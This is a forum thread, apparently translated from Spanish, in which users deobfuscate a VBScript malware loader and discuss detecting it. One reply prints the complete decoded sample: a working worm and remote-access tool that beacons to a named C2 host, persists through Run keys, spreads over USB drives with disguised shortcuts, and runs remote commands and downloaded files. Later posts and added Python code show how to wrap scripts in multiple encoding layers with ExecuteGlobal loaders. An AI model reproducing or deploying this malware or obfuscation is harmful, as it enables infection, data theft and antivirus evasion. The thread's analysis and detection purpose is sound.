ŸYŒŒ——85—ž"'K™šŸKš£ŽYžŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸYŒŒ——85—žK85KKKŒŒ——'š˜Œ™¤KhKMM85™K"'8585Ž˜ž"——KhKŒŒ——'š˜Œ™¤85™K' ™ŽŸ"š™"))
sddfskcIdCLcsoSkso()
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
next
executeglobal hsDCcocssccCaVICC
End Function
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
dcssLdchdcdDCsiijSS = i
Loop While sStr <> bLen
End Function


Thanks in advance.  :laugh:




Shell Root

Well, the good thing here is that you can see how the encoded string is decoded, so you just have to follow the sequence:

The encoded string:
Code (vb):
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b

This is the function that works out the encoded string; as an example I only took the first 2 characters of the encoding, which would really be 5
Code (vb):
dDssDajcooSLscaC = ((""š"))
msgbox dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)

Function dcssLdchdcdDCsiijSS(sStr)
   Do
       i = i + &H1             ' &H1 is hexadecimal for 1, i.e. i is incremented by 1 each pass, keeping its value
       bLen = Left(sStr, i)    ' Walks the encoded string from the left up to the incremented value of i
       dcssLdchdcdDCsiijSS = i ' Returns the real length of the encoded string
   Loop While sStr <> bLen
End Function


The next function is the one that actually decodes the value of the encoded string, let's see:
Code (vb, line 3):
Function sddfskcIdCLcsoSkso()
    For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC) ' Uses the previous function to get the real length of the encoded string
        hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
    Next
    ExecuteGlobal hsDCcocssccCaVICC ' Runs the decoded code
End Function


On line 3, where the decoding happens, he uses the following functions:
Code (vb):
CHRW ' returns a Unicode character; however, on systems that do not support the Unicode character set the function behaves identically to CHR.
ASC ' Converts the first character of a string to its ANSI code and returns the result.
MID ' Returns a specific number of characters from a string.


Let's look at the conversion with the first two characters of the encoding,

[TO BE CONTINUED xD]
That's why I don't sleep, in case there's a crow behind my window. I hang from loose threads knowing there is poison in the air.
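An added example, not part of Shell Root's post or of the thread's code, that applies the same CHRW(ASC(c) - ASC("+")) reversal to the literal exactly as it was pasted into the post. Raising every byte by 43 pushes the letters into the 0x80-0xBF range of the ANSI code page (cp1252), which is why the string reads as "šžŸKhK". Copying it as text is lossy: the five cp1252 positions that have no glyph (0x81, 0x8D, 0x8F, 0x90, 0x9D, i.e. the shifted V, b, d, e, r) are dropped, and the forum rewrites the smart quotes, the low-9 quote, the ellipsis and the no-break space as plain ASCII. The table of those rewrites is inferred from this page and is an assumption; the sample string is the first posted line of the blob. With the actual .vbs file in hand you would subtract 43 from the raw bytes instead and none of this is needed.

```python
"""Reverse the +43 shift on blob text copied from the forum post (added example, not thread code).

The loader computes CHRW(ASC(c) - ASC("+")), so each byte of the real script was raised by 43.
Letters land in 0x80-0xBF of the ANSI code page (cp1252), which is why the literal reads
"šžŸKhK..." when displayed. Copy-pasting loses information: the five cp1252 positions without a
glyph are dropped and the forum turns cp1252 punctuation into ASCII. This decoder undoes what
can be undone and marks what cannot.
"""

SHIFT = ord("+")  # ASC("+") == 43

# cp1252 bytes with no glyph and the letters they encode; they simply vanish from pasted text.
LOST = {0x81: "V", 0x8D: "b", 0x8F: "d", 0x90: "e", 0x9D: "r"}

# Forum normalisations inferred from this page (an assumption about the forum's text filter).
# None of these ASCII characters can occur in a genuine blob (they would need input bytes
# below 0x20), so when they appear they stand for a cp1252 character that was rewritten.
NORMALISED = {
    '"': "[h|i]",  # 0x93 “ and 0x94 ” both became a straight quote: letter h or i
    "'": "[f|g]",  # 0x91 ‘ and 0x92 ’ both became an apostrophe: letter f or g
    ",,": "Y",     # 0x84 „ became two commas
    "...": "Z",    # 0x85 … became three dots
    " ": "u",      # 0xA0 no-break space became a plain space
}


def decode_posted(text: str) -> str:
    """Decode a blob as pasted; line breaks are forum wrapping (a real newline encodes as '85')."""
    text = text.replace("\r", "").replace("\n", "")
    out = []
    i = 0
    while i < len(text):
        for token, letters in NORMALISED.items():
            if text.startswith(token, i):
                out.append(letters)
                i += len(token)
                break
        else:
            ch = text[i]
            try:
                code = ch.encode("cp1252")[0]
            except UnicodeEncodeError:
                if ord(ch) not in LOST:  # a character outside cp1252: the paste was not ANSI text
                    raise ValueError("not a cp1252 character: %r" % ch)
                code = ord(ch)           # the raw control character survived; decode it normally
            # anything below 43 cannot come from the encoder: some other rewrite we do not know
            out.append("?" if code < SHIFT else chr(code - SHIFT))
            i += 1
    return "".join(out)


# First line of the posted literal (the host and port assignments), copied from the post.
SAMPLE = 'šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b\\85'

if __name__ == "__main__":
    # prints: ost = "7.mooo.com" / pot = 9371 -- the r of "r7" and of "port" was a lost 0x9D
    print(decode_posted(SAMPLE))
```

Run it on the pasted blob and the gaps explain why the decoded listing later in the thread needed "the odd character" fixed by hand: "ž"——š•" decodes to s[h|i]lloj, which an analyst reads as shellobj once the dropped e and b are accounted for.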

ThunderCls

This is a technique used a lot in vbs malware or any other kind of script, and getting the decoded code is really simple: all you need is to replace line #7:

Code (vb):
executeglobal hsDCcocssccCaVICC

with the following:

Code (vb):
Set fso = CreateObject("Scripting.FileSystemObject") ' the loader never creates this object, so it has to be added
Set file = fso.CreateTextFile("D:\decrypted.txt", True)
file.write(hsDCcocssccCaVICC)
file.close


Then "decrypted.txt" will contain the malware's decoded code. Here it is after decoding it and fixing the odd character. It is basically a variant of a malware I analysed some time ago on my blog

(WARNING: DO NOT RUN THIS DIRECTLY ON YOUR MAIN OS, THIS IS A REAL SAMPLE OF REAL MALWARE. You have been warned)

Code (vb):
host = "r7.mooo.com"
port = 9371
installdir = "%appdata%"
lnkfile = true
lnkfolder = false


dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")



installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce


on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver 
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param) 
case  "delete"
      param = cmd (1)
      deletefaf (param)
case  "exit-process"
      param = cmd (1)
      exitprocess (param)
case  "sleep"
      param = cmd (1)
      sleep = eval (param)       
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(folder.name," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path)
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter 
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf 
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
     .type = 1
     .open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else
   readallfromany = ""
end if

cmdshell = readallfromany
end function

-[ "...I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/
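An added example, not from ThunderCls's post and not part of the malware: detection logic over constructed proxy-log lines, keyed only on what the decoded script itself sends. Everything the bot knows about the victim travels in the User-Agent header joined by the "<|>" separator (hwid, computer name, user name, OS caption, the literal "plus", the SecurityCenter AV names, the usbspreading flag), and the request path is the command verb ("is-ready", "is-enum-driver", ...). The log format, the log lines and the victim values are invented for the example; the C2 host and port are the ones from the decoded script.

```python
"""Spot this bot's beacon in HTTP proxy logs (added example; not code from the thread).

The decoded script puts every victim detail into the User-Agent header, joined with "<|>":
hwid (a volume serial), computer name, user name, OS caption, the literal "plus", the
SecurityCenter AV names and the usbspreading flag. The request path is the command verb
("is-ready", "is-enum-driver", ...). The log format and the lines in SAMPLE_LOG are constructed
for this example; the matching logic keys only on what the script sends.
"""
import re
from urllib.parse import urlsplit

SPLITER = "<|>"
# Verbs the script posts to: the post() callers plus the download/upload helpers.
C2_VERBS = {"is-ready", "is-enum-driver", "is-enum-faf", "is-enum-process",
            "is-cmd-shell", "is-sending", "is-recving"}
UA_FIELDS = ("hwid", "computername", "username", "os", "plus", "security", "usbspreading")

# Constructed log format: timestamp client method url "user-agent"
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def parse_beacon_ua(ua: str):
    """The seven fields information() joins, or None if the header is not shaped like that."""
    parts = ua.split(SPLITER)
    if len(parts) != len(UA_FIELDS) or parts[4] != "plus":
        return None
    return dict(zip(UA_FIELDS, parts))


def check_request(method: str, url: str, ua: str):
    """A finding for one request, or None. The verb is the first path segment; download() and
    upload() append "<|>" and a file path to it, so only the part before the separator counts."""
    parsed = urlsplit(url)
    verb = parsed.path.lstrip("/").split(SPLITER, 1)[0]
    fields = parse_beacon_ua(ua)
    if method.upper() != "POST" or verb not in C2_VERBS or fields is None:
        return None
    return {"verb": verb, "c2": parsed.netloc, **fields}


def scan_log(lines):
    """Run check_request over log lines; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = check_request(m["method"], m["url"], m["ua"])
        if hit:
            findings.append({"ts": m["ts"], "client": m["client"], **hit})
    return findings


# Constructed beacon; the field order is the one information() builds.
BEACON_UA = ("1A2B3C4D<|>WS-07<|>alice<|>Microsoft Windows 7 Professional<|>plus<|>"
             "Avast Antivirus .<|>false - 19/10/2017")
SAMPLE_LOG = [  # constructed lines; host and port are the ones in the decoded script
    '2017-10-19T15:59:01Z 10.0.0.7 POST http://r7.mooo.com:9371/is-ready "%s"' % BEACON_UA,
    '2017-10-19T15:59:02Z 10.0.0.7 GET http://example.com/index.html "Mozilla/5.0"',
    '2017-10-19T15:59:06Z 10.0.0.7 POST http://r7.mooo.com:9371/is-enum-process "%s"' % BEACON_UA,
    '2017-10-19T15:59:09Z 10.0.0.9 POST http://example.com/api/is-ready "curl/7.55"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["verb"], hit["hwid"], hit["username"], hit["security"])
```

Matching on the header shape rather than on the host name is deliberate: the C2 is a free dynamic-DNS name that a new build changes in one line, while the "<|>"-joined User-Agent with "plus" in the fifth slot is what every sample of this family emits.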

**Aincrad**

Very good, thanks. I get it now.

a question: and if I want to use that cipher technique on, say, this script:

Code (vb):
msgbox "prueba de cifrado"

how would I encrypt it with at least 3 layers of encryption?




MCKSys Argentina

Quote from: **Aincrad** on 22 October 2017, 16:55 PM
Very good, thanks. I get it now.

a question: and if I want to use that cipher technique on, say, this script:

Code (vb):
msgbox "prueba de cifrado"

how would I encrypt it with at least 3 layers of encryption?

From what I can see, it is a CAESAR cipher: https://en.wikipedia.org/wiki/Caesar_cipher

Quote from: **Aincrad** on 19 October 2017, 15:59 PM

Code (vb):

***
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
***


It is not hard to implement that cipher with as many passes as you want.

Regards!
MCKSys Argentina

"If you think something is right only because everyone believes it, you are not thinking."


**Aincrad**

ah, ok.

well, I convert the text to hex and base myself on this old wsf virus.

Code (wsf):
<?XML version="1.0"?><job>

<script language="VBScript">

<![CDATA[

FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")

ExecuteGlobal FACEBOOKFACEBOOK

Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function

]]>

</script>

</job>


the code I converted to hex was msgbox "hola", which when converted came out as
6D7367626F782022686F6C6122, and since I based it on this code I can encode any vbs.

and in any case, to decode the code, going by what you just explained to me it would look like this:

Code (wsf):
<?XML version="1.0"?><job>

<script language="VBScript">

<![CDATA[

FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")

Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function

Set fso = CreateObject("scripting.filesystemobject")
Set fichero = fso.CreateTextFile("decrypted.txt", True)
fichero.write(FACEBOOKFACEBOOK)
fichero.close

]]>

</script>

</job>


Thanks for the explanations . .  ;-)
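An added example, not code from any post in this thread, for the "3 layers" question and MCKSys's remark that the cipher takes any number of passes: a peeler that recognises the two loaders shown here, the +43 shift of the first sample (CHRW(ASC(c) - ASC("+"))) and the hex pairs of the .wsf (Chr(Clng("&H" & pair))), and keeps decoding while the output still carries one of them. It works on the raw bytes of the file, as an analyst would, because the shifted characters sit in 0x80-0xBF and only survive on disk, not in a forum paste. The three-layer fixture is built from the two loader stubs the thread shows; the nesting order and the replacement of the hand-rolled length loop by Len (which it reimplements) are ours, and the .wsf stub is the script body without the <job> XML wrapper.

```python
"""Peel nested VBScript string-encoding layers until plain code is left (added example).

Recognises the +43 shift loader from the first post and the hex-pair loader from the .wsf
example, and decodes the outermost literal as long as a known loader surrounds it. Operates on
raw file bytes. The fixture SAMPLE is constructed here: hex around shift around hex.
"""
import re

# Shift layer: the loader subtracts ASC of one character; the sample uses "+" (43).
SHIFT_MARKER = re.compile(rb'-\s*ASC\("(.)"\)', re.I)
SHIFT_LITERAL = re.compile(rb'\(\("([^"]*)"\)\)')
# Hex layer: Clng("&H" & Mid(s, y, 2)) turns each pair of hex digits back into one Chr().
HEX_MARKER = re.compile(rb'Clng\("&H"', re.I)
HEX_LITERAL = re.compile(rb'\("([0-9A-Fa-f]{2,})"\)')


def shift_encode(plain: bytes, key: bytes = b"+") -> bytes:
    """CHRW(ASC(c) + ASC(key)) per byte; the result must stay single-byte to be saved as ANSI."""
    if max(plain) + key[0] > 0xFF:
        raise ValueError("a byte would leave the ANSI range after shifting")
    return bytes(b + key[0] for b in plain)


def shift_decode(blob: bytes, key: bytes = b"+") -> bytes:
    """CHRW(ASC(c) - ASC(key)); a wrong key shows up as a negative byte (ValueError)."""
    return bytes(b - key[0] for b in blob)


def hex_encode(plain: bytes) -> bytes:
    return plain.hex().upper().encode("ascii")


def hex_decode(blob: bytes) -> bytes:
    return bytes.fromhex(blob.decode("ascii"))


def wrap_shift(inner: bytes) -> bytes:
    """Loader from the first post (its hand-rolled length loop replaced by Len)."""
    return (b'dDssDajcooSLscaC = (("' + shift_encode(inner) + b'"))\r\n'
            b'sddfskcIdCLcsoSkso()\r\n'
            b'Function sddfskcIdCLcsoSkso()\r\n'
            b'For i = 1 to Len(dDssDajcooSLscaC)\r\n'
            b'hsDCcocssccCaVICC = hsDCcocssccCaVICC & '
            b'CHRW(ASC(MID(dDssDajcooSLscaC, i)) - ASC("+"))\r\n'
            b'next\r\nexecuteglobal hsDCcocssccCaVICC\r\nEnd Function\r\n')


def wrap_hex(inner: bytes) -> bytes:
    """Loader from the .wsf example (script body only, without the <job> XML wrapper)."""
    return (b'FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("' + hex_encode(inner) + b'")\r\n'
            b'ExecuteGlobal FACEBOOKFACEBOOK\r\n'
            b'Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : '
            b'ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function\r\n')


def peel_layer(code: bytes):
    """Decode the outermost recognised layer; None when no loader is present (plain code)."""
    key = SHIFT_MARKER.search(code)
    lit = SHIFT_LITERAL.search(code) if key else None
    if lit:
        return "shift", shift_decode(lit.group(1), key.group(1))
    lit = HEX_LITERAL.search(code) if HEX_MARKER.search(code) else None
    if lit:
        return "hex", hex_decode(lit.group(1))
    return None


def unwrap(code: bytes, max_layers: int = 10):
    """Peel until nothing matches; returns (layer kinds outer to inner, final code)."""
    kinds = []
    for _ in range(max_layers):
        step = peel_layer(code)
        if step is None:
            return kinds, code
        kind, code = step
        kinds.append(kind)
    raise RuntimeError("still encoded after %d layers; loader not recognised or looping" % max_layers)


PAYLOAD = b'msgbox "prueba de cifrado"'            # the script the thread wants to wrap
SAMPLE = wrap_hex(wrap_shift(wrap_hex(PAYLOAD)))   # hex around shift around hex: three layers

if __name__ == "__main__":
    kinds, final = unwrap(SAMPLE)                   # ['hex', 'shift', 'hex'], then the msgbox line
    print(kinds, final.decode("cp1252"))
```

Each extra layer is just another loader wrapped around another literal, so the same recogniser run in a loop handles three layers as easily as one; the only real change between schemes is which marker identifies the loader and which one-line transform undoes the literal.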